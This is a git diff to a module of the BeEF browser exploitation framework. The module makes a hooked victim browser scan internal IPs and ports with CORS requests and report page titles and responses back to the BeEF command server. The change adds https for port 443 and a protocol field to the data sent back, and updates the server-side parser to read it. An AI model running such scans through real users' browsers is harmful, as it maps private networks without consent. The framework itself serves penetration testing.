diff --git a/modules/network/cross_origin_scanner_cors/command.js b/modules/network/cross_origin_scanner_cors/command.js index eb21f162c..b1c9077d5 100644 --- a/modules/network/cross_origin_scanner_cors/command.js +++ b/modules/network/cross_origin_scanner_cors/command.js @@ -100,10 +100,10 @@ beef.execute(function() { } // send CORS request to each IP - var proto = 'http'; for (var i=0; i < ips.length; i++) { var worker = workers[i % threads]; for (var p=0; p < ports.length; p++) { + if (ports[p] == '443') var proto = 'https'; else var proto = 'http'; var url = proto + '://' + ips[i] + ':' + ports[p]; worker.queue('beef.debug("[Cross-Origin Scanner (CORS)] Fetching URL: '+url+'");' + 'beef.net.cors.request(' + @@ -111,7 +111,7 @@ beef.execute(function() { 'if (response != null && response["status"] != 0) {' + 'beef.debug("[Cross-Origin Scanner (CORS)] Received response from '+url+': " + JSON.stringify(response));' + 'var title = response["body"].match("(.*?)<\\/title>"); if (title != null) title = title[1];' + - 'beef.net.send("<%= @command_url %>", <%= @command_id %>, "ip='+ips[i]+'&port='+ports[p]+'&status="+response["status"]+"&title="+title+"&response="+JSON.stringify(response));' + + 'beef.net.send("<%= @command_url %>", <%= @command_id %>, "proto='+proto+'&ip='+ips[i]+'&port='+ports[p]+'&status="+response["status"]+"&title="+title+"&response="+JSON.stringify(response));' + '}' + '});' ); diff --git a/modules/network/cross_origin_scanner_cors/module.rb b/modules/network/cross_origin_scanner_cors/module.rb index a39b9fb11..00be84d9e 100644 --- a/modules/network/cross_origin_scanner_cors/module.rb +++ b/modules/network/cross_origin_scanner_cors/module.rb @@ -16,10 +16,10 @@ class Cross_origin_scanner_cors < BeEF::Core::Command session_id = @datastore['beefhook'] # log the network service - if @datastore['results'] =~ /ip=(.+)&port=([\d]+)&status/ - ip = $1 - port = $2 - proto = 'http' + if @datastore['results'] =~ /^proto=(https?)&ip=(.+)&port=([\d]+)&status/ + proto = $1 + ip = $2 + port = $3 type = 'HTTP Server (CORS)' if BeEF::Filters.is_valid_ip?(ip) print_debug("Hooked browser found HTTP server #{ip}:#{port}")